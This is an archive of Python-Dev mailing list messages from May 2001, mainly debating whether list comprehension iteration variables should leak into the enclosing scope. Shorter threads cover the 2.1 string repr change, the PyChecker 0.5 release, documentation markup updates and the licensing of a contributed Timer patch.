If you can, David's address showed up as mailto:boogiemorg at aol.com

> -----Original Message-----
> From: python-list-admin at python.org
> [mailto:python-list-admin at python.org]On Behalf Of David Morgenthaler
> Sent: Wednesday, May 23, 2001 6:20 PM
> To: python-list at python.org
> Subject: What happened to Idle's extend.py?
>
>
> Idle-0.3, shipped with Python 1.5.2 had an extend.py module that was
> used to extend Idle. We've used this extensively, building entire
> "applications" as Idle extensions.
>
> Now that we're moving to Python 2.1, we find the same old directions
> for extending Idle (in extend.txt), but there appears to be no
> extend.py in Idle-0.8.
>
> Does anyone know how we can add extensions to Idle-0.8?
>
> Thanks in advance,
> David
> --
> http://mail.python.org/mailman/listinfo/python-list


From mwh at python.net  Tue May 29 10:00:42 2001
From: mwh at python.net (Michael Hudson)
Date: Tue, 29 May 2001 09:00:42 +0100 (BST)
Subject: [Python-Dev] file.writelines("foo\n","bar\n")
In-Reply-To: <LNBBLJKPBEHFEDALKOLCIEAHKFAA.tim.one@home.com>
Message-ID: <Pine.SOL.4.33.0105290854520.24723-100000@yellow.csi.cam.ac.uk>

On Tue, 29 May 2001, Tim Peters wrote:

> [Martin]
> > I took a special look at METH_OLDARGS occurrences.
>
> [GregE]
> > Shouldn't all these be removed? I would have thought
> > list.append was the last one!
>
> I count 42 of them remaining, usually for 0-argument functions.

There are more than that; PyMethodDefs that don't put anything in that
slot in the source are METH_OLDARGS too, and there are quite a few of them
in Modules/ (there are *lots* in _cursesmodule.c, but also in many of the
older modules - gl, rotor were easy to find).  There are also quite a lot
of functions that put literal zeros there, too.

So METH_OLDARGS is far from dead, sadly.

Cheers,
M.


From tim.one at home.com  Tue May 29 10:04:48 2001
From: tim.one at home.com (Tim Peters)
Date: Tue, 29 May 2001 04:04:48 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <200105211703.f4LH3xD01154@mira.informatik.hu-berlin.de>
Message-ID: <LNBBLJKPBEHFEDALKOLCAEBBKFAA.tim.one@home.com>

[from Monday, May 21, 2001 1:04 PM]

[Tim]
>> Unfortunately, it's 4 calls, as PyErr_Occurred() isn't a leaf.

[Martin v. Loewis]
> Any reason why PyThreadState_GET isn't used there?

Perhaps somebody's shift key got jammed?

sure-don't-see-a-good-reason-ly y'rs  - tim


From thomas at xs4all.net  Tue May 29 11:52:01 2001
From: thomas at xs4all.net (Thomas Wouters)
Date: Tue, 29 May 2001 11:52:01 +0200
Subject: [Python-Dev] Re: string repr in 2.1 (fwd)
Message-ID: <20010529115201.J676@xs4all.nl>

Robin apparently ran into a real problem caused by the change in string
repr() semantics. Now, arguably this is his own stupid fault <wink> (and
indeed he argues that himself) but that doesn't mean we shouldn't take this
into account. We could, for instance, revert 2.1.1 to the old behaviour,
giving at least *someone* a reason to switch to 2.1.1 ;) Or we could decide
what the string repr() change really wanted was just for the REPL to print
it like this, in which case the displayhook should fix it, not string_repr.

Opinions ? Ping, IIRC, this was your proposal, so yours would be especially
valuable ;)

----- Forwarded message from Robin Becker <robin at jessikat.fsnet.co.uk> -----

Date: Tue, 29 May 2001 09:58:49 +0100
From: Robin Becker <robin at jessikat.fsnet.co.uk>
To: Thomas Wouters <thomas at xs4all.net>
Cc: python-list at python.org
Subject: Re: string repr in 2.1

In message <20010529102414.P690 at xs4all.nl>, Thomas Wouters
<thomas at xs4all.net> writes
>On Tue, May 29, 2001 at 12:47:39AM +0100, Robin Becker wrote:
>> In article <slrn9h5m4o.1hk.scarblac at pino.selwerd.nl>, Remco Gerlich
>> <scarblac at pino.selwerd.nl> writes
>
>> >Since 2.1, string repr uses heximal escapes instead of octal ones.
>
>> yes I guess all those *nix tools that like octal should be whipped and
>> made to obey the malevolent dictator.
>
>Do you have tools you use to parse quoted (repr'd) Python strings that
>handle octal correctly, but don't handle \x and \n\r escape codes ? Which
>ones ? And were you aware that they were going to break sooner or later,
>just because someone can prefer 'readable' escape codes and feed it that
>instead ? :)
>
Yes I have such tools. One is called Acrobat Reader, another is
traditional sed and awk. My dos grep doesn't seem to like hex, I suppose
I must update it and all other tools. 
 
My C compiler understands octal and the newer ones do hex as well.

I can read octal and do arithmetic in it probably easier than hex. I
don't defend the octal representation it's just very widespread in the
older tools. Our usage of repr was probably stupid as clearly repr can
change. 

How I long for my 18-bit PDP-15 :) what happened to my 15 octal digit
cdc! Oh woe is me! Where are the duo-decimal calculators of yore? 
-- 
Robin Becker


----- End forwarded message -----

-- 
Thomas Wouters <thomas at xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From akuchlin at mems-exchange.org  Tue May 29 16:04:37 2001
From: akuchlin at mems-exchange.org (Andrew Kuchling)
Date: Tue, 29 May 2001 10:04:37 -0400
Subject: [Python-Dev] Removing doc/howto on python.org
In-Reply-To: <15122.38609.553115.107831@cj42289-a.reston1.va.home.com>; from fdrake@acm.org on Mon, May 28, 2001 at 02:20:01PM -0400
References: <E14cwQ7-0003q3-00@ute.cnri.reston.va.us> <15122.38609.553115.107831@cj42289-a.reston1.va.home.com>
Message-ID: <20010529100437.A15638@ute.cnri.reston.va.us>

On Mon, May 28, 2001 at 02:20:01PM -0400, Fred L. Drake, Jr. wrote:
>  It looks like I never replied to this.  It's probably dropped off
>your radar, but I'd say the answer is that the files on parrot should
>be discarded sooner rather than later -- when we actually manage to

Done.  Out of paranoia about doing 'rm -rf' within www.python.org's
tree, the files aren't deleted; instead I just moved them to my home
directory on parrot.

--amk


From aahz at rahul.net  Tue May 29 17:47:13 2001
From: aahz at rahul.net (Aahz Maruch)
Date: Tue, 29 May 2001 08:47:13 -0700 (PDT)
Subject: [Python-Dev] Killing threads
In-Reply-To: <LNBBLJKPBEHFEDALKOLCKEADKFAA.tim.one@home.com> from "Tim Peters" at May 28, 2001 09:49:29 PM
Message-ID: <20010529154713.11F8E99C80@waltz.rahul.net>

Tim Peters wrote:
> 
> [Aahz]
> > Futz.  *Now* it works.  <sigh>
> 
> Now *what* works?  The test case I posted, or the original test case you
> tried (which you didn't post)?

My original test case.  I didn't actually preserve it, so the code below
was my attempt to reconstruct it (but I think it's pretty close to the
test case I tried).  Don't worry, if I run into this again, I'll be
*much* more careful about preserving the evidence and fiddling with
variations; last time I just assumed it was pilot error.

from threading import Thread
import os

class Foo(Thread):
    def run(self):
        while 1:
            pass

f = Foo()
f.start()
os._exit(1)


From beazley at cs.uchicago.edu  Tue May 29 18:56:09 2001
From: beazley at cs.uchicago.edu (David Beazley)
Date: Tue, 29 May 2001 11:56:09 -0500 (CDT)
Subject: [Python-Dev] Iteration variables and list comprehensions
Message-ID: <15123.54441.925351.439879@gargoyle.cs.uchicago.edu>

I'm not sure if this has ever been brought up before (I don't recall
seeing it), but I would like to throw out something that has been
bugging me about list comprehensions for quite some time...

First of all, I have to say that I've really grown to like list
comprehensions a lot.  In fact, I find myself using them in just about
every Python program I've been writing since switching to Python 2.0.
However, I've also been shooting myself in the foot a little more than
usual due to the following issue:

When I write a list comprehension like this:

    s = [ expr(x) for x in t ]

it is *VERY* easy to overlook the fact that the iteration variable "x"
is evaluated in the local scope (and replaces any previous binding
to "x" that might have existed outside the context of the list
comprehension).    Because of this, I have frequently found myself
debugging the following programming error:

   # Some loop
   for x in r:
       ...
       # bunch of statements
       ...
       s = [expr(x) for x in t]
       ...
       # Try to do something with x.
       # ???? What in the hell is wrong with my program ????
       ...

The main problem is that I conceptually tend to think of the list
comprehension as being some kind of list operator where the index name
is really one of the operands in some sense.  Because of this, it is
*VERY* easy to get in the habit of throwing list comprehensions all
over the place, each of which uses a common index name like x,i,j,
etc.  Of course, this works just fine until you forget that you're
also using x,i,j for some kind of loop variable someplace else :-).

Therefore, I'm wondering if it would make any sense to make the
iterator variables used inside of a list comprehension private in some
manner--either through name mangling or some other technique? For
example:

   s = [expr(x) for x in t]

would get expanded into something roughly like this:

   s = [ ]
   for _mangled_x in t:
       s.append(expr(_mangled_x))
   del _mangled_x

Just as an aside, I have never intentionally used the iterator
variable of a list comprehension after the operation has completed. I
was actually quite surprised with this behavior the first time I saw
it.  I suspect most other programmers would not anticipate this side
effect either.

Comments?

Cheers,

Dave


From nas at python.ca  Tue May 29 19:01:41 2001
From: nas at python.ca (Neil Schemenauer)
Date: Tue, 29 May 2001 10:01:41 -0700
Subject: [Python-Dev] Iteration variables and list comprehensions
In-Reply-To: <15123.54441.925351.439879@gargoyle.cs.uchicago.edu>; from beazley@cs.uchicago.edu on Tue, May 29, 2001 at 11:56:09AM -0500
References: <15123.54441.925351.439879@gargoyle.cs.uchicago.edu>
Message-ID: <20010529100141.B18974@glacier.fnational.com>

David Beazley wrote:
> Just as an aside, I have never intentionally used the iterator
> variable of a list comprehension after the operation has completed.

I've been bitten by this one once.  It took a while to figure out
the problem.  I'm not sure that we can change it now though.

  Neil


From skip at pobox.com  Tue May 29 21:03:47 2001
From: skip at pobox.com (Skip Montanaro)
Date: Tue, 29 May 2001 14:03:47 -0500
Subject: [Python-Dev] [Stackless] Stackless for 2.1: Progress Report (fwd)
Message-ID: <15123.62099.473259.545781@beluga.mojam.com>


I pass this along in case anyone here has some ideas for Jeff about how to
workaround his problems with pyexpat.c.

Skip

-------------- next part --------------
An embedded message was scrubbed...
From: Jeff Rush <jrush at taupro.com>
Subject: [Stackless] Stackless for 2.1: Progress Report
Date: Tue, 29 May 2001 13:06:12 -0500
Size: 3437
URL: <http://mail.python.org/pipermail/python-dev/attachments/20010529/6d6875ae/attachment-0001.eml>

From gward at python.net  Tue May 29 23:21:55 2001
From: gward at python.net (Greg Ward)
Date: Tue, 29 May 2001 17:21:55 -0400
Subject: [Python-Dev] Iteration variables and list comprehensions
In-Reply-To: <15123.54441.925351.439879@gargoyle.cs.uchicago.edu>; from beazley@cs.uchicago.edu on Tue, May 29, 2001 at 11:56:09AM -0500
References: <15123.54441.925351.439879@gargoyle.cs.uchicago.edu>
Message-ID: <20010529172155.A8737@gerg.ca>

On 29 May 2001, David Beazley said:
> Therefore, I'm wondering if it would make any sense to make the
> iterator variables used inside of a list comprehension private in some
> manner--either through name mangling or some other technique? For
> example:

Two ideas occur to me:
  * make the list comprehension a new scoping level, which of course
    is doable now that we have sensible scoping semantics.  Presumably
    the usual warning message about shadowing variables from an
    outer scope will apply; you'll still have the bug in your code,
    but at least Python will tell you about it

  * don't make list comprehensions a separate scope, but add a
    little trickery so that something *like* the "shadowing variable
    from an outer scope" message is emitted

Haven't really thought about backwards compatibility issues...

        Greg


From paulp at ActiveState.com  Tue May 29 23:55:03 2001
From: paulp at ActiveState.com (Paul Prescod)
Date: Tue, 29 May 2001 14:55:03 -0700
Subject: [Python-Dev] Re: string repr in 2.1 (fwd)
References: <20010529115201.J676@xs4all.nl>
Message-ID: <3B141AB7.4C6DAFB6@ActiveState.com>

Thomas Wouters wrote:
> 
> Robin apparently ran into a real problem caused by the change in string
> repr() semantics. Now, arguably this is his own stupid fault <wink> (and
> indeed he argues that himself) but that doesn't mean we shouldn't take this
> into account. 

I think it is done now and it is better this way. The pain is over.
Reverting would hurt someone else again.

Displayhook should be used sparingly. One of the major virtues of the
REPL is that it behaves so much like standard Python.

-- 
Take a recipe. Leave a recipe.  
Python Cookbook!  http://www.ActiveState.com/pythoncookbook


From tim at digicool.com  Wed May 30 00:54:01 2001
From: tim at digicool.com (Tim Peters)
Date: Tue, 29 May 2001 18:54:01 -0400
Subject: [Python-Dev] Re: Time for the yearly list.append() panic
Message-ID: <BIEJKCLHCIOIHAGOKOLHOEKACAAA.tim@digicool.com>

FYI, I checked in a variation (listobject.c) over the weekend.

Win9x is ultimately hopeless, but we can grow a list there to about 35M
elements now instead of crapping out at < 2M, and it's zippy the whole way
until death.

Win2K (and I *assume* WinNT) benefit much more, as non-linear behavior was
obvious very early there.  Now it's flat and fast until physical RAM is
exhausted, and then it suffers looong (15-30 seconds) "hiccups" at resize
points.

Fred kindly confirmed that Linux isn't hurt.  Its behavior looks the same as
the new Win2K behavior, except that the Linux hiccups are much briefer
(although still obvious when they occur).

time-for-the-yearly-list.append()-celebration-ly y'rs  - tim


From neal at metaslash.com  Wed May 30 04:49:45 2001
From: neal at metaslash.com (Neal Norwitz)
Date: Tue, 29 May 2001 22:49:45 -0400
Subject: [Python-Dev] PyChecker v0.5 released
Message-ID: <3B145FC9.49813488@metaslash.com>

I was finally able to get version 0.5 out.  Just in case this is the
first time you are seeing this message, or you forgot what PyChecker is:

    PyChecker is a tool for finding common bugs in python source code.
    It finds problems that are typically caught by a compiler for less
    dynamic languages, like C and C++.  Because of the dynamic nature
    of python, some warnings may be incorrect; however,
    spurious warnings should be fairly infrequent.

The highlights are that code at the module scope is now checked.
There is still a problem with class variables and globals that are default
parameter values.  But other than that, there should be no more spurious
Variable unused warnings.

Code that makes PyChecker raise an exception should now be caught in most
cases and this produces a warning.  Please mail me if you find it blowing
up on your code.  The last line processed is shown in the warning, so
if you include some context, I can hopefully fix the problem.

Also, PyChecker should really use the files passed on the command line,
even if it uses the same module name internally.  So it will check your
warn.py, not PyChecker's warn.py.

Feedback, comments, criticisms, new ideas, better ideas, etc. are all 
greatly appreciated.  Thanks for everyone who has taken the time to mail me.
If you can think of common mistakes that are made that PyChecker doesn't
find, please let me know.

Here's the CHANGELOG:
  * Catch internal errors "gracefully" and turn into a warning
  * Add checking of most module scoped code
  * Add pychecker subdir to imports to prevent filename conflicts
  * Don't produce unused local variable warning if variable name == '_'
  * Add -g/--allglobals option to report all global warnings, not just first
  * Add -V/--varlist option to selectively ignore variable not used warnings
  * Add test script and expected results
  * Print all instructions when using debug (-d/--debug)
  * Overhaul internal stack handling so we can look for more problems
  * Fix glob'ing problems (all args after glob were ignored)
  * Fix spurious Base class __init__ not called
  * Fix exception on code like:  ['xxx'].index('xxx')
  * Fix exception on code like:  func(kw=(a < b))
  * Fix line numbers for import statements

PyChecker is available on Source Forge:
    Web page:           http://pychecker.sourceforge.net/
    Project page:       http://sourceforge.net/projects/pychecker/

Neal
--
pychecker at metaslash.com


From fdrake at cj42289-a.reston1.va.home.com  Wed May 30 07:31:01 2001
From: fdrake at cj42289-a.reston1.va.home.com (Fred Drake)
Date: Wed, 30 May 2001 01:31:01 -0400 (EDT)
Subject: [Python-Dev] [development doc updates]
Message-ID: <20010530053101.4985F28A10@cj42289-a.reston1.va.home.com>

The development version of the documentation has been updated:

	http://python.sourceforge.net/devel-docs/

Incremental update for development version of Python (2.2).

Mostly small updates, but I've worked on new markup for grammar
productions used in the Reference Manual.  Currently, only the lexical
productions in Chapter 2 of the manual have been converted to the new
markup and layout.  Please take a look and send comments to
doc-sig at python.org; the first page containing these changes is at:

    http://python.sourceforge.net/devel-docs/ref/identifiers.html

The changes needed to implement the markup have not been checked in
yet, and there are some bugs in the implementation (both for HTML and
PDF), but this should make the productions easier to navigate.

I've tested the HTML version on Linux only with Mozilla 0.9, Opera
5.0b8, and Netscape Navigator 4.77.  Navigator is definately lagging
behind in CSS support!

Also added Michel Pelletier's documentation for the HTMLParser module,
with some small changes.


From tim.one at home.com  Wed May 30 07:51:04 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 30 May 2001 01:51:04 -0400
Subject: [Python-Dev] RE: [Doc-SIG] [development doc updates]
In-Reply-To: <20010530053101.4985F28A10@cj42289-a.reston1.va.home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCKEEIKFAA.tim.one@home.com>

[Fred Drake]
> The development version of the documentation has been updated:
>
> 	http://python.sourceforge.net/devel-docs/
>
> Incremental update for development version of Python (2.2).
>
> Mostly small updates, but I've worked on new markup for grammar
> productions used in the Reference Manual.  Currently, only the lexical
> productions in Chapter 2 of the manual have been converted to the new
> markup and layout.  Please take a look and send comments to
> doc-sig at python.org; the first page containing these changes is at:
>
>     http://python.sourceforge.net/devel-docs/ref/identifiers.html
>
> The changes needed to implement the markup have not been checked in
> yet, and there are some bugs in the implementation (both for HTML and
> PDF), but this should make the productions easier to navigate.

Let me suggest starting with

    http://python.sourceforge.net/devel-docs/ref/integers.html

instead, and clicking on "digit" in the "hexdigit" production.  The problem
with the originally suggested page is that all the links point into the same
paragraph, so "nothing happens" when you click one.  But "digit" was the
cause of a bogus bug report, as the submitter didn't realize "digit" had
been defined earlier in the docs, and without something like these mondo
cool new links it's almost impossible to find cross-section production
definitions.

Stumbled into one glitch:  nonzerodigit doesn't resolve correctly; the
node24.html page it refers to doesn't seem to exist.


From fdrake at acm.org  Wed May 30 07:53:23 2001
From: fdrake at acm.org (Fred L. Drake, Jr.)
Date: Wed, 30 May 2001 01:53:23 -0400 (EDT)
Subject: [Python-Dev] RE: [Doc-SIG] [development doc updates]
In-Reply-To: <LNBBLJKPBEHFEDALKOLCKEEIKFAA.tim.one@home.com>
References: <20010530053101.4985F28A10@cj42289-a.reston1.va.home.com>
	<LNBBLJKPBEHFEDALKOLCKEEIKFAA.tim.one@home.com>
Message-ID: <15124.35539.53551.52668@cj42289-a.reston1.va.home.com>

Tim Peters writes:
 > Stumbled into one glitch:  nonzerodigit doesn't resolve correctly; the
 > node24.html page it refers to doesn't seem to exist.

  That was the bug alluded to.  The digit* grouped with the
nonzerodigit also doesn't work, although the other two uses of digit
on that page (floating.html) work properly.  I'll investigate
tomorrow; just too tired tonight.


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Digital Creations


From tim.one at home.com  Wed May 30 09:47:47 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 30 May 2001 03:47:47 -0400
Subject: [Python-Dev] Iteration variables and list comprehensions
In-Reply-To: <15123.54441.925351.439879@gargoyle.cs.uchicago.edu>
Message-ID: <LNBBLJKPBEHFEDALKOLCAEENKFAA.tim.one@home.com>

[David Beazley]
> ...
> However, I've also been shooting myself in the foot a little more
> than usual
> ...
> Because of this, I have frequently found myself debugging the
> following programming error:

If "frequently" is "a little more than usual", then it sounds like your
problems in all areas are too common for us to really help you by fixing
this one <wink>.

OK, I'm afraid the behavior follows from taking seriously the idea that
listcomps are syntactic sugar for a specific pattern of nested loops and
"if" tests.  That was done to make it explainable, and the correspondence is
indeed exact.  The implementation already creates "invisible" names:

>>> [repr(name) for name in globals().keys()]
["'__builtins__'", "'__name__'", "'name'", "'__doc__'", "'_[1]'"]
>>>

Where did "_[1]" come from?  You guessed it.  Look for it after the listcomp
finishes and it's gone:

>> globals().keys()
'__builtins__', '__name__', 'name', '__doc__']
>>

It's invisible because it's a temp var you *wouldn't* see in the equivalent
loop nest.

> ...
> Therefore, I'm wondering if it would make any sense to make the
> iterator variables used inside of a list comprehension private in some
> manner

I'm not sure it's worth losing the exact correspondence with nested loops;
or that it's not worth it either.  Note that "the iterator variables"
needn't be bare names:

>>> class x:
...     pass
...
>>> [1 for x.i in range(3)]
[1, 1, 1]
>>> x.i
2
>>>

This complicates explaining exactly how you want to deviate from the
for-loop model.  So, I think, does this:

>>> [i for i in range(2) for i in range(2, 5)]
[2, 3, 4, 2, 3, 4]
>>>

That is, even in simple cases, is the desired scope attached to the "for" or
to the "[]"?  Python doesn't have a problem with reusing a name as a for
target in nested loops (or in listcomps today).

> ...
> Just as an aside, I have never intentionally used the iterator
> variable of a list comprehension after the operation has completed.

Not even in a debugger, when the operation has completed via unexpected
exception, and you're desperate to know what the control vrbl was bound to
at the time of death?  Or in an exception handler?

>>> import sys
>>> try:
...     [i*i for i in xrange(sys.maxint)]
... except OverflowError:
...     raise OverflowError("oops! blew up at %d" % i)
...
Traceback (most recent call last):
  File "<stdin>", line 4, in ?
OverflowError: oops! blew up at 46341
>>>

Or what about:

i = 12
def f():
    print i
    return [i for i in range(i)]
f()

1. Should "print i" print 12, or raise UnboundLocalError?

2. Does the "i" in "range(i)" refer to the global i, or is that just
   senseless?

So long as the for-loop model is followed faithfully, nothing is hard to
explain or predict, and simply because there's nothing truly new.

> I was actually quite surprised with this behavior the first time I saw
> it.

Me too <wink>.

> I suspect most other programmers would not anticipate this side
> effect either.

I share the suspicion, but am not sure why:  "for" is a binding construct in
Python, so being surprised by "for" binding a name is itself surprising.

Another principled model is possible, where

    [f(i) for i in whatever]

is treated like

    (lambda: [f(i) for i in whatever])()

>>> i = 12
>>> (lambda: [i**2 for i in range(4)])()
[0, 1, 4, 9]
>>> i
12
>>>

That's more like Haskell does it.  But the day we explain a Python construct
in terms of a lambda transformation is the day Guido kills all of us <wink>.


From esr at thyrsus.com  Wed May 30 10:00:56 2001
From: esr at thyrsus.com (Eric S. Raymond)
Date: Wed, 30 May 2001 04:00:56 -0400
Subject: [Python-Dev] Iteration variables and list comprehensions
In-Reply-To: <LNBBLJKPBEHFEDALKOLCAEENKFAA.tim.one@home.com>; from tim.one@home.com on Wed, May 30, 2001 at 03:47:47AM -0400
References: <15123.54441.925351.439879@gargoyle.cs.uchicago.edu> <LNBBLJKPBEHFEDALKOLCAEENKFAA.tim.one@home.com>
Message-ID: <20010530040056.A27662@thyrsus.com>

Tim Peters <tim.one at home.com>:
> That's more like Haskell does it.  But the day we explain a Python construct
> in terms of a lambda transformation is the day Guido kills all of us <wink>.

They'll get *my* lambdas when they pry them from my cold, dead fingers <wink>,
but I find I don't have a strong opinion about how the scoping should work.
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

"Experience should teach us to be most on our guard to protect liberty
when the government's purposes are beneficient...  The greatest dangers
to liberty lurk in insidious encroachment by men of zeal, well meaning
but without understanding."
	-- Supreme Court Justice Louis Brandeis


From thomas at xs4all.net  Wed May 30 13:14:24 2001
From: thomas at xs4all.net (Thomas Wouters)
Date: Wed, 30 May 2001 13:14:24 +0200
Subject: [Python-Dev] Re: [Patches] [ python-Patches-428326 ] Timer class for threading
In-Reply-To: <E15525f-0003AG-00@usw-sf-web1.sourceforge.net>; from noreply@sourceforge.net on Wed, May 30, 2001 at 02:16:31AM -0700
References: <E15525f-0003AG-00@usw-sf-web1.sourceforge.net>
Message-ID: <20010530131424.Y690@xs4all.nl>

On Wed, May 30, 2001 at 02:16:31AM -0700, noreply at sourceforge.net wrote:

> OK, I'm un-withdrawing this patch.  Just had to get things
> straight with our lawyer. The patch is released under the
> following license (the X11 license with 4 extra paragraphs
> of disclaimers :):
> http://www.zoteca.com/opensource/LICENSE.txt

This raises an interesting point. Do we want separate pieces of the Python
distribution to have separate licences ? I'd point out that the zoteca
licence isn't mentioned on the OSI site as an Approved Licence, and that the
licence contains a copyright notice, but no clear statement whether it's
allowed to copy the licence other than together with the piece of software
it's distributed with.

The easiest solution would of course be for Itamar to get his boss/lawyers
to give us the right to relicence it under the PSF licence :)

-- 
Thomas Wouters <thomas at xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From jack at oratrix.nl  Wed May 30 14:26:39 2001
From: jack at oratrix.nl (Jack Jansen)
Date: Wed, 30 May 2001 14:26:39 +0200
Subject: [Python-Dev] Re: [Patches] [ python-Patches-428326 ] Timer class 
 for threading
In-Reply-To: Message by Thomas Wouters <thomas@xs4all.net> ,
	     Wed, 30 May 2001 13:14:24 +0200 , <20010530131424.Y690@xs4all.nl> 
Message-ID: <20010530122702.F3FE53B8999@snelboot.oratrix.nl>

> On Wed, May 30, 2001 at 02:16:31AM -0700, noreply at sourceforge.net wrote:
> 
> > OK, I'm un-withdrawing this patch.  Just had to get things
> > straight with our lawyer. The patch is released under the
> > following license (the X11 license with 4 extra paragraphs
> > of disclaimers :):
> > http://www.zoteca.com/opensource/LICENSE.txt
>
> [...]
>
> The easiest solution would of course be for Itamar to get his boss/lawyers
> to give us the right to relicence it under the PSF licence :)

I think this is the only viable solution. If various parts of Python have 
different license agreements this may well be a reason for people not to use 
Python because the hassle of figuring out which pieces fit their own licensing 
policy.
--
Jack Jansen             | ++++ stop the execution of Mumia Abu-Jamal ++++
Jack.Jansen at oratrix.com | ++++ if you agree copy these lines to your sig ++++
www.oratrix.nl/~jack    | see http://www.xs4all.nl/~tank/spg-l/sigaction.htm 


From beazley at cs.uchicago.edu  Wed May 30 15:49:29 2001
From: beazley at cs.uchicago.edu (David Beazley)
Date: Wed, 30 May 2001 08:49:29 -0500 (CDT)
Subject: [Python-Dev] Iteration variables and list comprehensions
In-Reply-To: <LNBBLJKPBEHFEDALKOLCAEENKFAA.tim.one@home.com>
References: <15123.54441.925351.439879@gargoyle.cs.uchicago.edu>
	<LNBBLJKPBEHFEDALKOLCAEENKFAA.tim.one@home.com>
Message-ID: <15124.64105.184857.499019@gargoyle.cs.uchicago.edu>

Tim Peters writes:
 > > Because of this, I have frequently found myself debugging the
 > > following programming error:
 > 
 > If "frequently" is "a little more than usual", then it sounds like your
 > problems in all areas are too common for us to really help you by fixing
 > this one <wink>.

I've probably been bitten by this about 5-10 times over the last few
months. I can also say that it's a real bugger to track down when it
happens.  Now while this may just be a user problem on my part (which
I can accept), I think there is a much deeper semantic problem with
the current implementation of list comprehensions.  Specifically, we
now have this really cool list construction technique that is, for all
practical purposes, an operator.  Yet, at the same time, this
"operator" has a really nasty side-effect of changing the values of
variables in the surrounding scope in a very unnatural and unexpected
way.

More generally, it's essentially the same behavior that you would get
if you wrote some code like this:

    a = expr(x,y)

and expr() went off and nuked the value of x, replacing it with
something completely different (note: I'm not talking about cases
where x might be mutable here).  Since you can write things like this

    a = [ 2*x for x in s]

it's easy to view the right hand side as being isolated in the same
way as a normal expression (where the name of the iteration variable
"x" is incidental--a throwaway if you will).

Maybe everyone else views list comprehensions as a series of
statements (the syntactic sugar for nested for-loop idea).  However,
if you look at how they can be used, it's completely different than
this.  Specifically, if I write something like this:

   a = [2*x for x in s] + [3*x for x in t]

I certainly don't conceptualize it as being literally expanded into
the following sequence of statements:

   t1 = [ ]
   for x in s:
      t1.append(2*x)
   t2 = [ ]
   for x in t:
      t2.append(3*x)
   a = t1 + t2

 > 
 > I'm not sure it's worth losing the exact correspondence with nested loops;
 > or that it's not worth it either.  Note that "the iterator variables"
 > needn't be bare names:
 > 
 > >>> class x:
 > ...     pass
 > ...
 > >>> [1 for x.i in range(3)]
 > [1, 1, 1]
 > >>> x.i
 > 2
 > >>>
 > 

Hmmm. I didn't realize that you could even do this.    Yes, this would
definitely present a problem.   However, if list comprehensions were
modified not to assign any names in the current scope, it still
seems like this would work (in this case, "x" is already defined and
"x.i" is not creating a new name, but is setting an attribute on
something else).   Couldn't nested scopes be used to implement this
in some manner?

 > > ...
 > > Just as an aside, I have never intentionally used the iterator
 > > variable of a list comprehension after the operation has completed.
 > 
 > Not even in a debugger, when the operation has completed via unexpected
 > exception, and you're desperate to know what the control vrbl was bound to
 > at the time of death?  Or in an exception handler?
 > 

Nope.  I don't make programming mistakes---well, other than this one,
and well, all of those other ones :-).

 > Another principled model is possible, where
 > 
 >     [f(i) for i in whatever]
 > 
 > is treated like
 > 
 >     (lambda: [f(i) for i in whatever])()
 > 
 > >>> i = 12
 > >>> (lambda: [i**2 for i in range(4)])()
 > [0, 1, 4, 9]
 > >>> i
 > 12
 > >>>
 > 
 > That's more like Haskell does it.  But the day we explain a Python construct
 > in terms of a lambda transformation is the day Guido kills all of us <wink>.

Ah yes, well this is exactly the kind of behavior that seems most
natural to me.   It's also the behavior that everyone expected went I
went around to the various Python hackers in the department and asked
them about it yesterday.

I suppose I could just write this:

  a = (lambda s: [2*i for i in s])(s)

However, that's pretty ugly.

In any case, I'm mostly just curious if anyone else has been bitten by
the problem I've described.  I would certainly love to see a fix for
it (I would even volunteer to work on a prototype implementation if
there is interest). On the other hand, if no changes are deemed
necessary, we should at least try to better emphasize this behavior in the
documentation--perhaps encouraging people to use private names.  For
example:

   a = [_i*2 for _i in t]
   
(although, I have to say that this just looks like a gross hack--I'd
rather not have to resort to doing this).

Cheers,

Dave


From fdrake at acm.org  Wed May 30 16:03:13 2001
From: fdrake at acm.org (Fred L. Drake, Jr.)
Date: Wed, 30 May 2001 10:03:13 -0400 (EDT)
Subject: [Python-Dev] Iteration variables and list comprehensions
In-Reply-To: <15124.64105.184857.499019@gargoyle.cs.uchicago.edu>
References: <15123.54441.925351.439879@gargoyle.cs.uchicago.edu>
	<LNBBLJKPBEHFEDALKOLCAEENKFAA.tim.one@home.com>
	<15124.64105.184857.499019@gargoyle.cs.uchicago.edu>
Message-ID: <15124.64929.215666.745913@cj42289-a.reston1.va.home.com>

David Beazley writes:
 > Maybe everyone else views list comprehensions as a series of
 > statements (the syntactic sugar for nested for-loop idea).  However,

  I certainly don't.  I know that that was used as part of the design
consideration, but it's not at all clear to me that this is
desirable.
  If I see code like this:

        x = 42
        L = [x**2 for x in range(2000)]
        print x

I think it should map to something like this from C++:

        int x = 42;
        int L[2000];

        for (int x = 0; x < 2000; ++x) {
            L[x] = x * x;
        }
        printf("%d\n", x);

i.e., both *should* print "42\n" on standard output.

Tim sez:
 > I'm not sure it's worth losing the exact correspondence with nested loops;
 > or that it's not worth it either.  Note that "the iterator variables"
 > needn't be bare names:
 > 
 > >>> class x:
 > ...     pass
 > ...
 > >>> [1 for x.i in range(3)]
 > [1, 1, 1]
 > >>> x.i
 > 2

David:
 > Hmmm. I didn't realize that you could even do this.    Yes, this would
 > definitely present a problem.   However, if list comprehensions were

  I didn't realize this either.  I'm quite surprised by it, in fact,
though I understand (I think) why it works that way.  But was this
intentional?  It seems like pure evil to me!  I'd only expect it to
support bare names and sequence unpacking (with only bare names at the
"edge" of all nested unpackings).


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Digital Creations


From gward at python.net  Wed May 30 16:36:30 2001
From: gward at python.net (Greg Ward)
Date: Wed, 30 May 2001 10:36:30 -0400
Subject: [Python-Dev] Iteration variables and list comprehensions
In-Reply-To: <15124.64105.184857.499019@gargoyle.cs.uchicago.edu>; from beazley@cs.uchicago.edu on Wed, May 30, 2001 at 08:49:29AM -0500
